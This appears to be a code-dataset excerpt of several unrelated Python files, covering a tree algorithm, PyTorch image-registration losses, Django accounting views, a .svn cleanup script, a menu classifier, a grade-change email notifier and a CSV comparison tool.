# guid = yzm.call('ref')
# self.logger.debug("guid is {}".format(guid))
#
# header = self.header
# header['User-Agent'] = random.choice(self.ua_list)
# yzm = self.sess.get(self.url_list['create_code_url'] + '?guid={}'.format(guid), headers=header,
# allow_redirects=False)
# self.logger.debug("yzm is {}".format(yzm))
# if yzm.status_code == 302:
# self.sess, self.vl5x = self.get_sess()
# continue
# if yzm.status_code >= 500:
# self.logger.debug('the service is bad and response_status_code is {}, wait one minute retry'.format(
# yzm.status_code))
# time.sleep(60)
# continue
# with open('captcha.jpg', 'wb') as f:
# f.write(yzm.content)
# # captcha = yundama.result_captcha('captcha.jpg')
# # Todo: use automatically way to get code
# captcha = input("Enter code: ")
# return captcha, guid
# except Exception as e:
# print('get captcah bad retry again')
# print(e) |
22,003 | 9ae0e8f6e975c37487e62c69ceef17b3edef1a94 | class TreeNode:
def __init__(self, value, left=None, right=None):
"""
:type value: int, left: TreeNode, right: TreeNode
"""
self.val = value
self.left = left
self.right = right
def printInorder(self):
if self:
if self.left:
self.left.printInorder()
print(self.val)
if self.right:
self.right.printInorder()
class Solution:
    def findLargestBST(self, root):
        """Return the root node of the largest BST subtree of *root*.

        :type root: TreeNode
        :rtype: TreeNode
        """
        BSTRoot, _ = self.findBST(root)
        return BSTRoot

    def findBST(self, root):
        """Return (node, size) for the largest BST subtree under *root*.

        Bug fix: the original only compared a node against its immediate
        children, so a deep violator (e.g. 10 -> 5 -> right-child 15) was
        wrongly accepted as a BST rooted at 10. This version tracks each
        subtree's min/max so every descendant must respect the bounds.
        Duplicates are allowed, matching the original <= / >= comparisons.

        :type root: TreeNode
        :rtype: (TreeNode, int)
        """
        _, _, _, best, best_size = self._scan(root)
        return (best, best_size)

    def _scan(self, node):
        """Post-order helper.

        Returns (is_bst, lo, hi, best_root, best_size): whether the subtree
        rooted at *node* is itself a BST, its min/max values (None for an
        empty subtree), and the largest BST found within it.
        """
        if not node:
            return (True, None, None, None, 0)
        l_ok, l_lo, l_hi, l_best, l_size = self._scan(node.left)
        r_ok, r_lo, r_hi, r_best, r_size = self._scan(node.right)
        # This node roots a BST iff both children do and all left values
        # are <= node.val and all right values are >= node.val.
        if (l_ok and r_ok
                and (l_hi is None or l_hi <= node.val)
                and (r_lo is None or r_lo >= node.val)):
            size = l_size + r_size + 1
            lo = node.val if l_lo is None else l_lo
            hi = node.val if r_hi is None else r_hi
            return (True, lo, hi, node, size)
        # Otherwise keep the larger candidate; ties favour the left side,
        # as in the original implementation.
        if l_size >= r_size:
            return (False, None, None, l_best, l_size)
        return (False, None, None, r_best, r_size)
if __name__ == '__main__':
    # Demo: the largest BST in this tree is the one rooted at 16.
    sample = TreeNode(
        5,
        TreeNode(4,
                 TreeNode(7),
                 TreeNode(5, TreeNode(4, TreeNode(3)), TreeNode(6))),
        TreeNode(16,
                 TreeNode(9),
                 TreeNode(29, TreeNode(25), TreeNode(42))),
    )
    largest = Solution().findLargestBST(sample)
    largest.printInorder()
|
22,004 | f018d071506b1436efd99af293dda8e0df404575 | import boto3
ec2_client = boto3.client("ec2")
ec2_client.detach_volume(InstanceId="String ID on Instance",
VolumeId="String Volume ID") |
22,005 | 6fe2e229c5b78dd4ebfc41a121cfcea6888385b2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 6 15:21:40 2018
@author: user
from: https://github.com/voxelmorph/voxelmorph/blob/master/src/losses.py
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
class LCC(nn.Module):
    """
    Local (over window) normalized cross correlation loss (squared form).

    Returns 1 - mean(NCC^2) over all window positions, so a perfect local
    match approaches 0 and uncorrelated images approach 1.
    """
    def __init__(self, win=(9, 9), eps=1e-5):
        """
        :param win: (height, width) of the local window. Fixed the original
            mutable-default-argument smell (list -> tuple); lists still work.
        :param eps: stabilizer added to the variance product.
        """
        super(LCC, self).__init__()
        self.win = win
        self.eps = eps

    def forward(self, I, J):
        """Compute the local NCC loss between images I and J, shape (B,1,H,W)."""
        kernel = Variable(torch.ones(1, 1, self.win[0], self.win[1]))
        if I.is_cuda:  # gpu
            kernel = kernel.cuda()
        pad = (self.win[0] // 2, self.win[1] // 2)

        def box_sum(t):
            # sliding-window sum via convolution with an all-ones kernel
            return F.conv2d(t, kernel, stride=1, padding=pad)

        I_sum = box_sum(I)
        J_sum = box_sum(J)
        I2_sum = box_sum(I.pow(2))
        J2_sum = box_sum(J.pow(2))
        IJ_sum = box_sum(I * J)

        win_size = self.win[0] * self.win[1]
        u_I = I_sum / win_size
        u_J = J_sum / win_size

        # window-local covariance and variances (expanded-sum form)
        cross = IJ_sum - u_J * I_sum - u_I * J_sum + u_I * u_J * win_size
        I_var = I2_sum - 2 * u_I * I_sum + u_I * u_I * win_size
        J_var = J2_sum - 2 * u_J * J_sum + u_J * u_J * win_size

        cc = cross * cross / (I_var * J_var + self.eps)
        return -1.0 * torch.mean(cc) + 1
class GCC(nn.Module):
    """
    Global normalized cross correlation loss (sqrt form): 1 - NCC(I, J).
    """
    def __init__(self):
        super(GCC, self).__init__()

    def forward(self, I, J):
        """Compute 1 - global Pearson correlation between I and J."""
        # first and second moments of both images and of their product
        mean_I, mean_J = I.mean(), J.mean()
        mean_I2, mean_J2 = I.pow(2).mean(), J.pow(2).mean()
        mean_IJ = (I * J).mean()

        cross = mean_IJ - mean_I * mean_J
        var_I = mean_I2 - mean_I.pow(2)
        var_J = mean_J2 - mean_J.pow(2)

        # cc = cross*cross / (var_I*var_J + np.finfo(float).eps)  # squared variant
        cc = cross / (var_I.sqrt() * var_J.sqrt() + np.finfo(float).eps)
        return -1.0 * cc + 1
class Grad(nn.Module):
    """
    N-D gradient (smoothness) loss on a dense prediction, e.g. a flow field.
    """
    def __init__(self, penalty='l2'):
        super(Grad, self).__init__()
        self.penalty = penalty

    def _diffs(self, y):  # y: (bs, nfeat, *vol_shape)
        """Forward differences of y along every spatial axis."""
        ndims = y.ndimension() - 2
        result = [None] * ndims
        for i in range(ndims):
            d = i + 2  # spatial axis index in (bs, c, d, h, w)
            # Bring axis d to the front; note y deliberately stays permuted
            # across iterations, mirroring the reference implementation
            # (the values differenced per axis are unchanged).
            y = y.permute(d, *range(d), *range(d + 1, ndims + 2))
            delta = y[1:, ...] - y[:-1, ...]
            # permute back (ordering is irrelevant to the mean-based loss)
            result[i] = delta.permute(*range(1, d + 1), 0, *range(d + 1, ndims + 2))
        return result

    def forward(self, pred):
        """Average l1 or l2 magnitude of pred's spatial gradients."""
        ndims = pred.ndimension() - 2
        total = Variable(torch.zeros(1).cuda() if pred.is_cuda else torch.zeros(1))
        for delta in self._diffs(pred):
            if self.penalty == 'l1':
                total += delta.abs().mean() / ndims
            else:
                assert self.penalty == 'l2', 'penalty can only be l1 or l2. Got: %s' % self.penalty
                total += delta.pow(2).mean() / ndims
        return total
class Bend_Penalty(nn.Module):
    """
    Bending-energy penalty of a 2-D spatial transformation (sum of squared
    second derivatives of the displacement field).
    """
    def __init__(self):
        super(Bend_Penalty, self).__init__()

    def _diffs(self, y, dim):  # y: (bs, nfeat, *vol_shape)
        """Forward difference of y along spatial axis *dim* (0=rows, 1=cols)."""
        ndims = y.ndimension() - 2
        axis = dim + 2
        # move the target axis to the front, difference, then restore order
        shifted = y.permute(axis, *range(axis), *range(axis + 1, ndims + 2))
        delta = shifted[1:, ...] - shifted[:-1, ...]
        return delta.permute(*range(1, axis + 1), 0, *range(axis + 1, ndims + 2))

    def forward(self, pred):  # pred: (B, C, H, W)
        """Return Tyy^2 + Txx^2 + 2*Txy^2, each averaged over the field."""
        Ty = self._diffs(pred, dim=0)
        Tx = self._diffs(pred, dim=1)
        Tyy = self._diffs(Ty, dim=0)
        Txx = self._diffs(Tx, dim=1)
        Txy = self._diffs(Tx, dim=0)
        return Tyy.pow(2).mean() + Txx.pow(2).mean() + 2 * Txy.pow(2).mean()
class IDloss(nn.Module):
    """
    Distance between a predicted 2-D affine parameter vector and the
    identity transform (1, 0, 0, 0, 1, 0), as an L1 or L2 mean.
    """
    def __init__(self, penalty='l1'):
        super(IDloss, self).__init__()
        self.penalty = penalty
        # Flattened 2x3 identity affine matrix.
        self.id = torch.FloatTensor([1, 0, 0, 0, 1, 0])

    def forward(self, theta):
        identity = Variable(self.id.cuda() if theta.is_cuda else self.id)
        # Tile to the batch size and match theta's layout (B, 6) or (B, 2, 3).
        identity = identity.repeat(theta.size(0), 1).view(theta.shape)
        residual = theta - identity
        if self.penalty == 'l1':
            return torch.mean(torch.abs(residual))
        assert self.penalty == 'l2', 'penalty can only be l1 or l2. Got: %s' % self.penalty
        return torch.mean(torch.pow(residual, 2))
#test
#a=torch.zeros(1, 2, 30, 40)
#grad=Grad()
#loss = grad(a)
#l = Bend_Penalty()
#a=torch.zeros(1, 2, 30, 40)
#c=l(a)
#print(c) |
22,006 | 4c6e04bf2fa0decefbd6f03538d3f28d801cf459 | a=int(input("Enter a value for a"))
b=int(input("Enter a value for b"))
#multiply a and b
c=a*b
print(c) |
22,007 | 49db7dea645e1f472b28ae314637900a27fb00f8 | from django.shortcuts import render
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.urls import reverse_lazy
from django.views.generic import CreateView,ListView,UpdateView,View,FormView,DeleteView,DetailView
from django.shortcuts import redirect,reverse,resolve_url,render,HttpResponse
from django.db.models import FloatField, F,Sum,Case,When,IntegerField,Value,Min,Q,Count,Max
from django.db.models import ProtectedError  # used by the *Delete views' except clauses
from django.utils.decorators import method_decorator
from user.decorators import *
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
import datetime
from payment.views import create_payment
from account.common import *
from account.models import *
from account.forms import *
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class RegisterExpense(LoginRequiredMixin,CreateView):
    """Record a new expense: saves the expense row, creates the payment and
    writes the matching journal / bank-journal entries."""
    login_url = reverse_lazy('login-user')
    redirect_field_name = 'next'
    template_name = 'expenses/new.html'
    form_class = ExpenseForm
    context_object_name = 'forms'
    header='Record Expense'

    def get_context_data(self, **kwargs):
        context = super().get_context_data()
        context['header'] = self.header
        context['forms'] = self.form_class
        return context

    def post(self,request, *args,**kwargs ):
        form = self.form_class(request.POST)
        if form.is_valid():
            form=form.save(commit=False)
            ###Create payment
            amount=request.POST.get('amount')
            payment=create_payment(amount,form.desc,form.date,request.user,1,request.POST.get('account'),request.POST.get('trans_account'))
            ####JOURNALIZE
            insert_on_journal(payment.id,form.date,form.desc,amount,amount,form.invoice,form.champion,request.POST.get('account'),request.POST.get('trans_account'))
            insert_on_bankjournal(payment.id, form.date, form.desc, 0,amount, form.invoice, form.champion, request.POST.get('account'))
            form.dr=request.POST.get('amount')
            form.payment_id=payment.id
            form.save()
            # Fixed copy-pasted message: this view records an expense,
            # it does not create a company.
            messages.success(request, 'Success! recorded expense')
            return redirect('expenses')
        else:
            # Re-render with the bound form AND the page header (the header
            # was missing here, so the error page lost its title).
            return render(request,self.template_name,{'forms':form,'header':self.header})
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ExpenseList(LoginRequiredMixin,ListView):
    """List every expense journal row (newest first) plus the current-year total."""
    login_url = reverse_lazy('login-user')
    redirect_field_name = 'next'
    template_name = 'expenses/expenses.html'
    context_object_name = 'lists'
    header = ' Expense Lists'
    model=Expensejournal
    # NOTE(review): `order` is not a Django ListView attribute (that would be
    # `ordering`), so this line is dead; get_context_data overrides 'lists' anyway.
    order=['-id']
    def get_context_data(self, **kwargs):
        context = super().get_context_data()
        context['header'] = self.header
        # Explicitly ordered queryset replaces the default object list.
        context['lists']=Expensejournal.objects.all().order_by('-id')
        # Sum of debits (dr) for the current calendar year.
        context['exsum'] = Expensejournal.objects.filter(date__year=datetime.datetime.today().year).aggregate(sum2=Sum('dr'))['sum2']
        return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ExpenseInGroups(LoginRequiredMixin,ListView):
    """Expenses aggregated per account for one year (?year=YYYY, default: current year)."""
    login_url = reverse_lazy('login-user')
    redirect_field_name = 'next'
    template_name = 'expenses/expenses_by_account.html'
    context_object_name = 'lists'
    header = ' Expense Lists'
    model=Expensejournal
    order=['-id']

    def get_context_data(self,*args, **kwargs):
        context = super().get_context_data()
        # ?year= is untrusted query input: fall back to the current year when
        # it is missing or not numeric (previously ?year=abc raised a 500).
        try:
            year = int(self.request.GET.get('year'))
        except (TypeError, ValueError):
            year = datetime.datetime.today().year
        context['header'] = self.header+' ['+str(year)+']'
        # Per-account debit totals and row counts for the selected year.
        context['lists']=Expensejournal.objects.filter(date__year=year).values(accountname=F('account__name')).annotate(
            AccSum=Sum('dr'),no=Count('id')
        )
        context['exsum'] = Expensejournal.objects.filter(date__year=year).aggregate(sum2=Sum('dr'))['sum2']
        return context
################################################
###########DELETE DELETE#############################
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class DeleteTransaction(LoginRequiredMixin,View):
    """Delete one whole transaction, then return to the expense list.

    The actual removal is delegated to account.common.delete_transaction;
    presumably it drops the payment and its journal rows — confirm there.
    """
    login_url = reverse_lazy('login-user')
    redirect_field_name = 'next'
    def get(self,request,*args,**kwargs):
        # NOTE(review): destructive action on a GET request — works from a plain
        # link but is not idempotent as HTTP GET is expected to be.
        delete_transaction(self.kwargs['pk'])
        messages.success(request,'Deleted transaction ')
        return redirect(reverse('expenses'))
################################
###########CREATE CHART#############
####CHARTS
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CreateChart(LoginRequiredMixin,CreateView):
    """Create a new chart of accounts (top level of the account hierarchy)."""
    redirect_field_name = 'next'
    # NOTE(review): URL name 'login_user' differs from the 'login-user' used by
    # the expense views above — confirm which name the URLconf declares.
    login_url = reverse_lazy('login_user')
    model = Chartofaccount
    fields = ['name','accountno']
    template_name = 'chart/new.html'
    context_object_name = 'form'
    header='New Chart of Account'
    success_url = reverse_lazy('charts')
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class UpdateChartofAccount(LoginRequiredMixin,UpdateView):
    """Edit an existing chart of accounts (same form/template as CreateChart)."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Chartofaccount
    fields = ['name','accountno']
    template_name ='chart/new.html'
    context_object_name = 'form'
    header='Update Chart'
    success_url = reverse_lazy('charts')
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ChartofaccountDelete(LoginRequiredMixin,DeleteView):
    """Delete a chart of accounts; protected rows produce a warning instead of a 500.

    GET is routed to POST so a plain link can trigger the delete (no
    confirmation template is used).
    """
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Chartofaccount
    success_message = "Success! deleted charts."

    def post(self, request, *args, **kwargs):
        try:
            response = self.delete(request, *args, **kwargs)
        except ProtectedError:
            # Row is referenced through protected FKs — report instead of crashing.
            messages.warning(request,'Huwezi kufuta chart hii, kuna data zinategemea data hii')
            return redirect('charts')
        # DeleteView alone never shows success_message (that needs
        # SuccessMessageMixin + form_valid), so emit it explicitly.
        messages.success(request, self.success_message)
        return response

    def get(self, request, *args, **kwargs):
        # Delete directly on GET (no confirmation page).
        return self.post(request, *args, **kwargs)

    def get_success_url(self):
        return reverse('charts')
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class ChartsList(LoginRequiredMixin,ListView):
    """List all charts of accounts."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Chartofaccount
    context_object_name = 'lists'
    template_name = 'chart/lists.html'
    header='Charts of accounts'
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
###END CHART###########################
################################
###########CREATE ACCOUNTCATEGORY#############
####CACCOUNT CATEGORY
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CreateAccountcategory(LoginRequiredMixin,CreateView):
    """Create an account category under a chart of accounts."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Accountcategory
    fields = ['name','accountno','chart']
    template_name = 'categoryaccount/new.html'
    context_object_name = 'form'
    header='New Account Category'
    success_url = reverse_lazy('accountcategories')
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class UpdateAccountcategory(LoginRequiredMixin,UpdateView):
    """Edit an existing account category (same form/template as the create view)."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Accountcategory
    fields = ['name','accountno','chart']
    template_name ='categoryaccount/new.html'
    context_object_name = 'form'
    header='Update Category'
    success_url = reverse_lazy('accountcategories')
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CategoryaccountDelete(LoginRequiredMixin,DeleteView):
    """Delete an account category; protected rows produce a warning instead of a 500.

    GET is routed to POST so a plain link can trigger the delete.
    """
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Accountcategory
    # Fixed copy-pasted text (said "charts"); shown explicitly in post().
    success_message = "Success! deleted category."

    def post(self, request, *args, **kwargs):
        try:
            response = self.delete(request, *args, **kwargs)
        except ProtectedError:
            # Referenced through protected FKs — report instead of crashing.
            messages.warning(request,'Huwezi kufuta Account category hii, kuna data zinategemea data hii')
            return redirect('accountcategories')
        # DeleteView alone never shows success_message; emit it explicitly.
        messages.success(request, self.success_message)
        return response

    def get(self, request, *args, **kwargs):
        # Delete directly on GET (no confirmation page).
        return self.post(request, *args, **kwargs)

    def get_success_url(self):
        return reverse('accountcategories')
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class AccountcategoryList(LoginRequiredMixin,ListView):
    """List all account categories."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Accountcategory
    context_object_name = 'lists'
    template_name = 'categoryaccount/lists.html'
    header='Category accounts'
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
###END ACCOUNT CATEGORY###########################
################################
###########CREATE ACCOUNT#############
####CACCOUNT ACCOUNT
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class CreateAccount(LoginRequiredMixin,CreateView):
    """Create a ledger account under a chart and category; flags mark cash/bank accounts."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Account
    fields = ['name','accountno','chart','accountcategory','is_cashaccount','is_bankaccount']
    template_name = 'account/new.html'
    context_object_name = 'form'
    header='New Account '
    success_url = reverse_lazy('accounts')
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class UpdateAccount(LoginRequiredMixin,UpdateView):
    """Edit an existing ledger account (same form/template as CreateAccount)."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Account
    fields = ['name','accountno','chart','accountcategory','is_cashaccount','is_bankaccount']
    template_name ='account/new.html'
    context_object_name = 'form'
    header='Update Account'
    success_url = reverse_lazy('accounts')
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class AccountDelete(LoginRequiredMixin,DeleteView):
    """Delete a ledger account; protected rows produce a warning instead of a 500.

    GET is routed to POST so a plain link can trigger the delete.
    """
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Account
    # Fixed copy-pasted text (said "charts"); shown explicitly in post().
    success_message = "Success! deleted account."

    def post(self, request, *args, **kwargs):
        try:
            response = self.delete(request, *args, **kwargs)
        except ProtectedError:
            # Referenced through protected FKs — report instead of crashing.
            messages.warning(request,'Huwezi kufuta Account hii, kuna data zinategemea data hii')
            return redirect('accounts')
        # DeleteView alone never shows success_message; emit it explicitly.
        messages.success(request, self.success_message)
        return response

    def get(self, request, *args, **kwargs):
        # Delete directly on GET (no confirmation page).
        return self.post(request, *args, **kwargs)

    def get_success_url(self):
        return reverse('accounts')
deco_user=[all_account_permission]
@method_decorator(deco_user,name='dispatch')
class AccountList(LoginRequiredMixin,ListView):
    """List all ledger accounts."""
    redirect_field_name = 'next'
    login_url = reverse_lazy('login_user')
    model = Account
    context_object_name = 'lists'
    template_name = 'account/lists.html'
    header=' Accounts'
    def get_context_data(self, **kwargs):
        context=super().get_context_data()
        context['header']=self.header
        return context
###END ACCOUNT ###########################
|
22,008 | 37218a4c2ab15649d89a6174e7ff8b9db961a0bc | #!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2008-2017 German Aerospace Center (DLR) and others.
# This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v2.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v20.html
# @file removeSVN.py
# @author Daniel Krajzewicz
# @author Michael Behrisch
# @date 28-08-2008
# @version $Id$
from __future__ import absolute_import
import os
import sys
import stat
import shutil
def remove_svn(path="./"):
    """Recursively delete every ``.svn`` directory below *path*.

    Two passes: first make all entries inside ``.svn`` trees writable and
    delete the files (shutil.rmtree can fail on read-only entries, notably
    on Windows), then remove the emptied ``.svn`` directories themselves.
    """
    # Pass 1: match ".svn" as a literal path segment (the original substring
    # test `root.find(".svn") >= 0` also matched names like "my.svn-backup").
    for root, dirs, files in os.walk(path):
        if ".svn" in root.split(os.sep):
            for name in files:
                target = os.path.join(root, name)
                os.chmod(target, stat.S_IWRITE | stat.S_IREAD)
                os.remove(target)
            for name in dirs:
                os.chmod(os.path.join(root, name), stat.S_IWRITE | stat.S_IREAD)
    # Pass 2: remove the ".svn" trees (and stop os.walk descending into them).
    for root, dirs, files in os.walk(path):
        if ".svn" in dirs:
            dirs.remove(".svn")
            svn_dir = os.path.join(root, ".svn")
            os.chmod(svn_dir, stat.S_IWRITE | stat.S_IREAD)
            shutil.rmtree(svn_dir)


if __name__ == "__main__":
    # Optional single argument: the directory to clean (defaults to ".").
    remove_svn(sys.argv[1] if len(sys.argv) > 1 else "./")
|
22,009 | 267069959776b68cd8af6506a137cfcc4438f496 | class MenuItem:
    def __init__(self, meal_number: int, meal_name: str, price : float, description: str, ingredients: list):
        """Create a menu item.

        Args:
            meal_number: number identifying the item on the menu.
            meal_name: display name of the meal.
            price: price of the meal.
            description: customer-facing description text.
            ingredients: list of ingredient names.
        """
        self.meal_number = meal_number
        self.meal_name = meal_name
        self.price = price
        self.description = description
        self.ingredients = ingredients
22,010 | ad7725a5d0732a41dc95b2456387857db62fb6c4 | from classification.classificators.rules.daily_menu.cousine import CousineClassificator
from classification.classificators.rules.daily_menu.simple_rules import *
from classification.models import DailyMenuClassification
from classification.tagger.rules.simple_rules import Vegetarian, Vegan
from restaurants.models import Cousine
class DailyMenuClassificator:
    """Applies tag-based rules to a daily menu and stores the boolean results
    on a DailyMenuClassification row (one column per rule)."""

    # Built-in rules shared by all instances; __init__ works on a copy.
    classification_rules = [
        ClassificationRule(column='vegetarian', mandatory_tags=[Vegetarian.name]),
        ClassificationRule(column='vegan', mandatory_tags=[Vegan.name]),
        ClassificationRule(column='pork', mandatory_tags=['vepr', 'slanina']),
        ClassificationRule(column='beef', mandatory_tags=['hovezi']),
        ClassificationRule(column='pasta', mandatory_tags=['testovina']),
        ClassificationRule(column='fish', mandatory_tags=['ryba', 'rybi']),
        ClassificationRule(column='poultry', mandatory_tags=['drubez']),
        ClassificationRule(column='seafood', mandatory_tags=['morske']),
        ClassificationRule(column='meat', mandatory_tags=['maso']),
        ClassificationRule(column='mushrooms', mandatory_tags=['houba', 'houbovy']),
        ClassificationRule(column='tofu', mandatory_tags=['tofu']),
        ClassificationRule(column='venison', mandatory_tags=['divocina']),
        ClassificationRule(column='cheese', mandatory_tags=['syr']),
    ]

    def __init__(self):
        # BUG FIX: copy the class-level list before extending it. The original
        # appended cousine rules directly to the class attribute, so every
        # instantiation accumulated another full set of cousine rules shared
        # by all instances.
        self.classification_rules = list(self.classification_rules)
        cousines = Cousine.objects.prefetch_related('cousinetags_set').all()
        for cousine in cousines:
            self.classification_rules.append(CousineClassificator(cousine=cousine))

    def get_classification_columns(self):
        """Return the classification model column handled by each active rule."""
        return [rule.column for rule in self.classification_rules]

    def reset_classification(self, menu):
        """Drop the menu's previous automatic classification (if any) and
        attach a fresh, empty DailyMenuClassification row to it."""
        if menu.automatic_classification:
            DailyMenuClassification.objects.filter(pk=menu.automatic_classification).delete()
        model = DailyMenuClassification()
        model.save()
        menu.automatic_classification = model
        menu.classification_in_progress = False  # classification is assigned, now we need to calculate it
        menu.save()
        return model

    def run_classification(self, menu, tags):
        """Evaluate every rule against (menu, tags) and persist the results.

        Each rule returns a (column, value) pair; a None column means the
        rule produced no verdict and is skipped.
        """
        model = self.reset_classification(menu)
        for rule in self.classification_rules:
            classification = rule.classify(menu, tags)
            if model and classification[0] is not None:
                setattr(model, classification[0], classification[1])
        model.save()
|
22,011 | c818bc090904b619ec3872fe9145a44ac733888f | import os
import requests
import pickledb
from update_email import GradeUpdateEmail
def get_cycle(session, url):
    """POST to the active-cycles endpoint and return the first cycle's id."""
    response = session.post(url)
    payload = response.json().get('data')
    return payload[0].get('id_ciclo')
def get_student_info(session, url):
    """POST to the student-data endpoint and return the student id ('ide')
    of the first academic level."""
    response = session.post(url)
    body = response.json()
    return body.get('data').get('niveles')[0].get('ide')
def main():
    """Fetch current final grades from the UNISON portal, diff them against the
    locally persisted pickledb snapshot, and email a notice for every change."""
    # pickledb snapshot file (PROJECT_PATH must point at the project directory)
    PICKLE_FN = 'grades.p'
    PICKLE_DIR = os.environ.get('PROJECT_PATH', 'PROJECT_PATH Not Set')
    PICKLE_PATH = f'{PICKLE_DIR}/{PICKLE_FN}'
    # Data store (second arg True = auto-dump on every set)
    store = pickledb.load(PICKLE_PATH, True)  # Grades store
    # UNISON api urls
    LOGIN_URL = 'https://buhos.uson.mx/web/apps/portalAlumnos/index.php/auth/login/entrar'
    GRADES_URL = 'https://buhos.uson.mx/portalalumnos/obtener/calificacionesFinalesEstudiante'
    INFO_URL = 'https://buhos.uson.mx/web/apps/portalAlumnos/index.php/auth/sesion/datos_alumno'
    CYCLE_URL = 'https://buhos.uson.mx/web/apps/portalAlumnos/index.php/horario/ciclosActivos'
    # Unison portal auth
    PORTAL_USER = os.environ.get('PORTAL_USER', 'User Not Set')
    PORTAL_PW = os.environ.get('PORTAL_PW', 'Password Not Set')
    form_data_login = {'u': PORTAL_USER, 'p': PORTAL_PW}
    USER_EMAIL = os.environ.get('USER_EMAIL', 'Email Not Set')  # For emails
    with requests.Session() as s:
        s.post(LOGIN_URL, data=form_data_login)
        # Cycle id for grades
        id_cycle = get_cycle(s, CYCLE_URL)
        # Student id for grades
        id_student = get_student_info(s, INFO_URL)
        grades_res = s.post(GRADES_URL, data={
            'idEstudiante': id_student,
            'idCiclo': id_cycle,
        })
        subjects = grades_res.json().get('data')
        print([f'{dic["DescMateria"]} - {dic["Cal"] or 0}' for dic in subjects])
        for subject in subjects:
            subject_id = subject.get('ClaveMateria')
            subject_grade = subject.get('Cal')
            subject_name = subject.get('DescMateria')
            if store.exists(subject_id):
                old_grade = store.get(subject_id)
                if subject_grade != old_grade:  # clearer than `not x == y`
                    print(f'Calificacion de {subject_name} ha sido actualizada!')
                    # Save update to store
                    store.set(subject_id, subject_grade)
                    # Send email!
                    email = GradeUpdateEmail(USER_EMAIL)
                    email.send_update(subject_name, subject_grade)
            else:
                # First sighting of this subject: seed the snapshot, no email.
                print(f'Create {subject_name} store in pickledb!')
                store.set(subject_id, subject_grade)


if __name__ == '__main__':
    main()
|
22,012 | b8c68c5723a791672bdd589bc3ddd1842b70ef78 | '''
Created on Nov 7, 2016
@author: Ishan.Bhatt
'''
import csv
import sys
import argparse
import pandas as pd
#from _regex_core import String
from __builtin__ import str
import os
import pdb
from pandas.io.tests.parser import skiprows
import time
def read_key_rules(keys_path):
    """Parse the key-rules file (lines of ``name:col,col,...``) into a dict
    mapping a file-name pattern to its list of key column indexes (strings)."""
    rules = {}
    with open(keys_path, 'r') as csvfile:
        for row in csv.reader(csvfile, delimiter=':'):
            rules[row[0]] = row[1].split(',')
    return rules
def get_keys(file1, key_rules):
    """Return the key-column list of the first rule whose file-name pattern
    occurs in *file1*, or None when no rule matches (caller must check).

    Uses ``.items()`` (works on both Python 2 and 3) instead of the
    Python-2-only ``.iteritems()``.
    """
    for fname, keys in key_rules.items():
        if fname in file1:
            return keys  # a list of column indexes as strings, e.g. ['0', '1']
    return None
def get_non_keys(file1,keys):
    """Derive the column layout of *file1* from a two-row sample.

    Returns (non_keys, timestamp_col_index, comparable_cols) where the last
    column of the file is never compared and the second-to-last column is
    the timestamp (excluded from the key/non-key split).
    """
    sample = pd.read_csv(file1, nrows=2, sep=',|\|', engine='python')
    (_, n_cols) = sample.shape
    comparable = set(range(n_cols - 1))  # drop the final column outright
    timestamp_col_index = n_cols - 2     # second-to-last column holds the timestamp
    comparable.remove(timestamp_col_index)
    key_cols = set(map(int, keys))
    non_keys = comparable - key_cols
    return (list(non_keys), timestamp_col_index, list(comparable))
def compare_csv(file1, file2, keys, non_keys, timestamp_col_index,all_keys, op_folder):
    '''
    Compare two delimited extracts on their key columns and write five
    result files into op_folder:
      perfect_matched.csv - keys AND non-key columns identical in both files
      partial_matched.csv - keys match, rows differ; Vision row is the newest
      ubsr_updated.csv    - keys match, rows differ; UBSR row is the newest
      vision_only.csv     - key combination present only in file1 (Vision)
